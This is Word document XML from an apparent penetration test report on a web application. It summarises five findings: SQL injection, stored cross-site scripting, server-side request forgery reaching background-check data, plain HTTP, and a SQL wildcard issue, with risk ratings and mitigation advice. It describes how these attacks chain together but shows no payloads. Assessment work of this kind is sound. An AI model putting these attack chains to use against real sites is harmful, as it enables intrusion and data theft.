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325098"/>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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PleaseHold</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">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8FDE72C"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allows a user to brute-force all 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3E0E7EC7"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a piece of code to the database, which will perform unauthorised actions when triggered. As a result of </w:t>
      </w:r>
      <w:r w:rsidR="00182512">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>such</w:t>
      </w:r>
      <w:r w:rsidR="006A780C">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00182512">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">users </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>will</w:t>
      </w:r>
      <w:r w:rsidR="00182512">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> be able to leak out the server file content which </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r w:rsidR="00182512">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> be feeding to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">another high-risk </w:t>
      </w:r>
      <w:r w:rsidR="003F65A8">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">vulnerability – </w:t>
      </w:r>
      <w:r w:rsidR="00182512">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="003F65A8">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00182512">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">server-side request forgery can be </w:t>
      </w:r>
      <w:r w:rsidR="002D5E3D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>made through the website validation API (Finding 3) based on the information gained from cross-site scripting</w:t>
      </w:r>
      <w:r w:rsidR="002C68B3">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> to access sensitive background checks information</w:t>
      </w:r>
      <w:r w:rsidR="002D5E3D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5905517B" w14:textId="3C13B9A5" w:rsidR="00C823F1" w:rsidRDefault="00C823F1" w:rsidP="00183A73">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BC5C03D" w14:textId="0DF5766F" w:rsidR="00C823F1" w:rsidRPr="00C823F1" w:rsidRDefault="007D48C1" w:rsidP="00183A73">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Next, the use of HTTP protocol</w:t>
      </w:r>
      <w:r w:rsidR="00BA184D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> presents medium risk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the web applicatio</w:t>
      </w:r>
      <w:r w:rsidR="00C43205">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00AC002E">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Finding 4)</w:t>
      </w:r>
      <w:r w:rsidR="00C75982">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>. The last vulnerability, the SQL wildcard attack through the</w:t>
      </w:r>
      <w:r w:rsidR="00A12CB7">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A12CB7">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>trainings</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C75982">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> API (Finding 5)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> can</w:t>
      </w:r>
      <w:r w:rsidR="00C75982">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>list out all the</w:t>
      </w:r>
      <w:r w:rsidR="00C75982">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> trainings in the store</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>. I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> this case, it is considered to be low-risk since no sensitive information involved</w:t>
      </w:r>
      <w:r w:rsidR="000609AF">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Proper mitigations are still recommended</w:t>
      </w:r>
      <w:r w:rsidR="000609AF">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> if </w:t>
      </w:r>
      <w:r>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43BA1028" w14:textId="1A5B2E94" w:rsidR="00A71545" w:rsidRDefault="00580D52" w:rsidP="00183A73">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Based on these findings, the website is not secure enough for production.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p>
    <w:p w14:paraId="393A7284" w14:textId="77777777" w:rsidR="00A71545" w:rsidRDefault="00A71545" w:rsidP="00183A73">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A83ABB8" w14:textId="540AB123" w:rsidR="00D62BCA" w:rsidRPr="001C3373" w:rsidRDefault="00580D52" w:rsidP="00183A73">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">The low-risk vulnerability, SQL wildcard attack, can be fixed along with the SQL injection. The medium-risk vulnerability, depending on the deadline and budgetary constraints, </w:t>
      </w:r>
      <w:r w:rsidR="00410DBA">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>can be mitigated optionally with proper warnings displayed.</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DB970FC" w14:textId="2AFA5801" w:rsidR="005D7009"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325098" w:history="1">
            <w:r w:rsidR="005D7009" w:rsidRPr="002F72C2">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Executive Summary</w:t>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71325098 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6E302D2A" w14:textId="78D6DB6C" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71325099" w:history="1">
            <w:r w:rsidR="005D7009" w:rsidRPr="002F72C2">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Summary of Findings</w:t>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71325099 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4941983F" w14:textId="18B1789E" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71325100" w:history="1">
            <w:r w:rsidR="005D7009" w:rsidRPr="002F72C2">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Detailed Findings</w:t>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71325100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747A899E" w14:textId="5BA1D668" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71325101" w:history="1">
            <w:r w:rsidR="005D7009" w:rsidRPr="002F72C2">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">Finding 1 - SQL </w:t>
            </w:r>
            <w:r w:rsidR="005D7009" w:rsidRPr="002F72C2">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>injection vulnerability present in finding user functionality</w:t>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71325101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1BFE5F59" w14:textId="19B3AB79" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71325102"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_Toc71325102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089C9102" w14:textId="1BD6B88C" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71325103"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_Toc71325103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7973ABA0" w14:textId="1AB8F2A2" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71325104"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_Toc71325104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658C1847" w14:textId="2F858086" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71325105"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_Toc71325105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4A8C3F13" w14:textId="14C0787B" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71325106"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_Toc71325106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015C893C" w14:textId="3C443EA3" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71325107"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_Toc71325107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5609614B" w14:textId="50A9D749" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71325108"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_Toc71325108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40E65150" w14:textId="118E54C8" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71325109" w:history="1">
            <w:r w:rsidR="005D7009" w:rsidRPr="002F72C2">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Finding 2 - Stored cross-site scripting vulnerability present in anonymous question functionality</w:t>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71325109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ECA51E9" w14:textId="1FA117D9" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71325110"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_Toc71325110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12B54E69" w14:textId="0029A41F" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71325111"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_Toc71325111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08DC1CC" w14:textId="78D0C4F8" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71325112"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_Toc71325112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69509D07" w14:textId="3007FC7F" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71325113"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_Toc71325113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4A5014A" w14:textId="53B4733D" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71325114"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_Toc71325114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92F555D" w14:textId="4DF9489E" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71325115"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_Toc71325115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07EAB6B1" w14:textId="7F9AB5F4" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71325116"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_Toc71325116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26F58F9" w14:textId="1472BDBC" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71325117" w:history="1">
            <w:r w:rsidR="005D7009" w:rsidRPr="002F72C2">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Finding 3 - Server-side request forgery vulnerability present in the website validation functionality</w:t>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="005D7009">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71325117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14B53CE6" w14:textId="22A9F370" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71325118"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_Toc71325118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07EE0160" w14:textId="5E476F40" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71325119"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_Toc71325119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50B76DBB" w14:textId="4E372D47" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71325120"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_Toc71325120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27F97F12" w14:textId="5F5B7567" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71325121"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_Toc71325121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298C8ABD" w14:textId="085CE4A6" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71325122"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_Toc71325122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0FB34D27" w14:textId="4A7CBEFD" w:rsidR="005D7009" w:rsidRDefault="006A7AB3">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
